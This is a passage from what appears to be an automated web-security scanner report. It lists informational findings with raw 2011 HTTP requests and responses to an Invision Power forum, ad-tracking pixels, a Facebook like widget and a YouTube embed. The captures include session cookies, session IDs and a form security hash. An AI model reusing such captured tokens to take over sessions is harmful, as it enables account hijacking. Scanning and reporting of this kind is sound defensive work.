       ipb.vars['fb_uid']                = 0;
       /* ---- cookies ----- */
       ipb.vars['cookie_id']            = 'cforums_';
       ipb.vars['cookie_domain']        = 'community.invisionpower.com';
       ipb.vars['cookie_path']            = '/';
       /* ---- Rate imgs ---- */
       ipb.vars['rate_img_on']            = 'http://community.invisionpower.com/public/style_images/master/bullet_star.png';
       ipb.vars['rate_img_off']        = 'http://community.invisionpower.com/public/style_images/master/bullet_star_off.png';
       ipb.vars['rate_img_rated']        = 'http://community.invisionpower.com/public/style_images/master/bullet_star_rated.png';
       /* ---- Uploads ---- */
       ipb.vars['swfupload_swf']        = 'http://community.invisionpower.com/public/js/3rd_party/swfupload/swfupload.swf';
       ipb.vars['swfupload_enabled']    = true;
       ipb.vars['use_swf_upload']        = ( '' == 'flash' ) ? true : false;
       ipb.vars['swfupload_debug']        = false; /* SKINNOTE: Turn off for production */
       /* ---- other ---- */
       ipb.vars['live_search_limit']    = 4;
       ipb.vars['highlight_color']        = "#ade57a";
       ipb.vars['charset']                = "iso-8859-1";
       ipb.vars['use_rte']                = 1;
       ipb.vars['image_resize']        = 1;
       ipb.vars['image_resize_force'] = 650;
       ipb.vars['seo_enabled']            = 1;

       ipb.vars['seo_params']            = {"start":"-","end":"\/","varBlock":"\/page__","varSep":"__"};

       /* Templates/Language */
       ipb.templates['ajax_loadi
...[SNIP]...

14.3. http://community.invisionpower.com/index.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://community.invisionpower.com
Path:	/index.php

Request 1

GET /index.php?app=core&module=global&section=register HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/files/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); maan_session_id=42dba258540c68eecf8b0d153ac3f241; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.2.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; __utmz=161164207.1305476788.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/suite/demo.php; cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzC1rgVcMFuGBpc%2C; cforums_session_id=fc80ab95e32758d1802ba670bea26e2c; __utma=161164207.2049003496.1305476788.1305476788.1305476788.1; __utmc=161164207; __utmb=161164207.3.10.1305476788

Response 1

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=a2f496f10ae9f4c6e324e11108d09b40; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Sat, 14 May 2011 16:26:43 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 40365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<![CDATA[
       /* ---- URLs ---- */
       ipb.vars['base_url']            = 'http://community.invisionpower.com/index.php?s=a2f496f10ae9f4c6e324e11108d09b40&';
       ipb.vars['board_url']            = 'http://community.invisionpower.com';
       ipb.vars['loading_img']        = 'http://community.invisionpower.com/public/style_images/master/loading.gif';
       ipb.vars['active_app']            = 'core';
       ipb.vars['upload_url']            = 'http://community.invisionpower.com/uploads';
       /* ---- Member ---- */
       ipb.vars['member_id']            = parseInt( 0 );
       ipb.vars['is_supmod']            = parseInt( 0 );
       ipb.vars['is_admin']            = parseInt( 0 );
       ipb.vars['secure_hash']        = '880ea6a14ea49e853634fbdc5015a024';
       ipb.vars['session_id']            = 'a2f496f10ae9f4c6e324e11108d09b40';
       ipb.vars['can_befriend']        = true;
       ipb.vars['twitter_id']            = 0;
       ipb.vars['fb_uid']                = 0;
       /* ---- cookies ----- */
       ipb.vars['cookie_id']            = 'cforums_';
       ipb.vars['cookie_domain']        = 'community.invisionpower.com';
       ipb.vars['cookie_path']            = '/';
       /* ---- Rate imgs ---- */
       ipb.vars['rate_img_on']            = 'http://community.invisionpower.com/public/style_images/master/bullet_star.png';
       ipb.vars['rate_img_off']        = 'http://community.invisionpower.com/public/style_images/master/bullet_star_off.png';
       ipb.vars['rate_img_rated']        = 'http://community.invisionpower.com/public/style_images/master/bullet_star_rated.png';
       /* ---- Uploads ---- */
       ipb.vars['swfupload_swf']        = 'http://community.invisionpower.com/public/js/3rd_party/swfupload/swfupload.swf';
       ipb.vars['swfupload_enabled']    = true;
       ipb.vars['use_swf_upload']        = ( '' == 'flash' ) ? true : false;
       ipb.vars['swfupload_debug']        = false; /* SKINNOTE: Turn off for production */
       /* ---- other ---- */
       ipb.vars['live_search_limit']    = 4;
       ipb.vars['highlight_color']        = "#ade57a";
       ipb.vars['charset']                = "iso-8859-1";
       ipb.vars['use_rte']                = 1;
       ipb.vars['image_resize']        = 1;
       ipb.vars['image_resize_force'] = 650;
       ipb.vars['seo_enabled']            = 1;

       ipb.vars['seo_params']            = {"start":"-","end":"\/","varBlock":"\/page__","varSep":"__"};

       /* Templates/Language */
       ipb.templates['ajax_load
...[SNIP]...

Request 2

GET /index.php?app=core&module=global&section=register HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); maan_session_id=42dba258540c68eecf8b0d153ac3f241; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.2.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; __utmz=161164207.1305476788.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/suite/demo.php; cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzC1rgVcMFuGBpc%2C; cforums_session_id=fc80ab95e32758d1802ba670bea26e2c; __utma=161164207.2049003496.1305476788.1305476788.1305476788.1; __utmc=161164207; __utmb=161164207.3.10.1305476788

Response 2

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:27:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=81893aacbc2976ee401102515677fdd0; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Sat, 14 May 2011 16:27:49 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 40355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<![CDATA[
       /* ---- URLs ---- */
       ipb.vars['base_url']            = 'http://community.invisionpower.com/index.php?s=81893aacbc2976ee401102515677fdd0&';
       ipb.vars['board_url']            = 'http://community.invisionpower.com';
       ipb.vars['loading_img']        = 'http://community.invisionpower.com/public/style_images/master/loading.gif';
       ipb.vars['active_app']            = 'core';
       ipb.vars['upload_url']            = 'http://community.invisionpower.com/uploads';
       /* ---- Member ---- */
       ipb.vars['member_id']            = parseInt( 0 );
       ipb.vars['is_supmod']            = parseInt( 0 );
       ipb.vars['is_admin']            = parseInt( 0 );
       ipb.vars['secure_hash']        = '880ea6a14ea49e853634fbdc5015a024';
       ipb.vars['session_id']            = '81893aacbc2976ee401102515677fdd0';
       ipb.vars['can_befriend']        = true;
       ipb.vars['twitter_id']            = 0;
       ipb.vars['fb_uid']                = 0;
       /* ---- cookies ----- */
       ipb.vars['cookie_id']            = 'cforums_';
       ipb.vars['cookie_domain']        = 'community.invisionpower.com';
       ipb.vars['cookie_path']            = '/';
       /* ---- Rate imgs ---- */
       ipb.vars['rate_img_on']            = 'http://community.invisionpower.com/public/style_images/master/bullet_star.png';
       ipb.vars['rate_img_off']        = 'http://community.invisionpower.com/public/style_images/master/bullet_star_off.png';
       ipb.vars['rate_img_rated']        = 'http://community.invisionpower.com/public/style_images/master/bullet_star_rated.png';
       /* ---- Uploads ---- */
       ipb.vars['swfupload_swf']        = 'http://community.invisionpower.com/public/js/3rd_party/swfupload/swfupload.swf';
       ipb.vars['swfupload_enabled']    = true;
       ipb.vars['use_swf_upload']        = ( '' == 'flash' ) ? true : false;
       ipb.vars['swfupload_debug']        = false; /* SKINNOTE: Turn off for production */
       /* ---- other ---- */
       ipb.vars['live_search_limit']    = 4;
       ipb.vars['highlight_color']        = "#ade57a";
       ipb.vars['charset']                = "iso-8859-1";
       ipb.vars['use_rte']                = 1;
       ipb.vars['image_resize']        = 1;
       ipb.vars['image_resize_force'] = 650;
       ipb.vars['seo_enabled']            = 1;

       ipb.vars['seo_params']            = {"start":"-","end":"\/","varBlock":"\/page__","varSep":"__"};

       /* Templates/Language */
       ipb.templates['ajax_load
...[SNIP]...

14.4. http://d.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://d.adroll.com
Path:	/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA

Request 1

GET /pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA?pv=63902280456.386505&cookie=SNWCKNCH3JFBBA3BHHHZOL%3A1%7CYNYIFZAM3NACFPVLCC56LA%3A1%7CYBTCZKMLVJGNJKSIKUO3HL%3A1& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response 1

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Sun, 15 May 2011 16:54:33 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA/WU5STEO2IBFPDJIARLWYYE.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

Request 2

GET /pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA?pv=63902280456.386505&cookie=SNWCKNCH3JFBBA3BHHHZOL%3A1%7CYNYIFZAM3NACFPVLCC56LA%3A1%7CYBTCZKMLVJGNJKSIKUO3HL%3A1& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=d10276ea02f90b643e343970f448660f

Response 2

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Sun, 15 May 2011 16:54:53 GMT
Connection: keep-alive
Set-Cookie: __adroll=d10276ea02f90b643e343970f448660f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA/YBTCZKMLVJGNJKSIKUO3HL.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

14.5. http://www.conversionruler.com/bin/tracker.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.conversionruler.com
Path:	/bin/tracker.php

Request 1

Response 1

Request 2

GET /bin/tracker.php?siteid=4630&actn=0&refb=http%3A//www.insidefacebook.com/&referer=http%3A//www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/%3Fsource%3Dhspd-InsideFacebook-200x200ad-201104&crcookie=154e559a28a399b35c2a8c350a39b64f&ti=Facebook%20Page%20Marketing%20ebook%202011&l=en-US&sc=1920x1200-32&j=1&ct=B5FBrF&gmto=300&v=3524&isjs=1&_r=10093813171305478395537537 HTTP/1.1
Host: www.conversionruler.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: crct=1; settings4630=154e559a28a399b35c2a8c350a39b64f; CRSess_4630=bedd75afae9ab2972e7541e502c6ce8d

Response 2

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:16 GMT
Server: Apache/2.2.11 (FreeBSD)
Set-Cookie: CRSess_4630=bedd75afae9ab2972e7541e502c6ce8d; expires=Sun, 15-May-2011 17:23:16 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 50
Connection: close
Content-Type: text/javascript

if (window.CRX) window.CRX++; else window.CRX = 1;

14.6. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.votigo.com&layout=button_count&show_faces=false&width=170&action=like&font=lucida+grande&colorscheme=light&height=27 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.25.41
X-Cnection: close
Date: Sun, 15 May 2011 16:53:15 GMT
Content-Length: 6410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd004fbcde501869805387" class="connect_widget button_count" style="font-family: "lucida grande", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"5dc1a351",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:378427,vip:"66.220.158.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"45dcb",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"J324q":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yh\/r\/HD3OAbjOVTn.css"},"V02Ya":{"type":"css","permanen
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.votigo.com&layout=button_count&show_faces=false&width=170&action=like&font=lucida+grande&colorscheme=light&height=27 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.62.79
X-Cnection: close
Date: Sun, 15 May 2011 16:53:20 GMT
Content-Length: 6341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd00500905866173822683" class="connect_widget button_count" style="font-family: "lucida grande", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"237dc7f4",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:378427,vip:"66.220.158.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"45dcb",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"J324q":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yh\/r\/HD3OAbjOVTn.css"},"V02Ya":{"type":"css","permanen
...[SNIP]...

14.7. http://www.youtube.com/v/m0UQucWM0Zw previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.youtube.com
Path:	/v/m0UQucWM0Zw

Request 1

GET /v/m0UQucWM0Zw?fs=1&hl=en_US HTTP/1.1
Host: www.youtube.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JI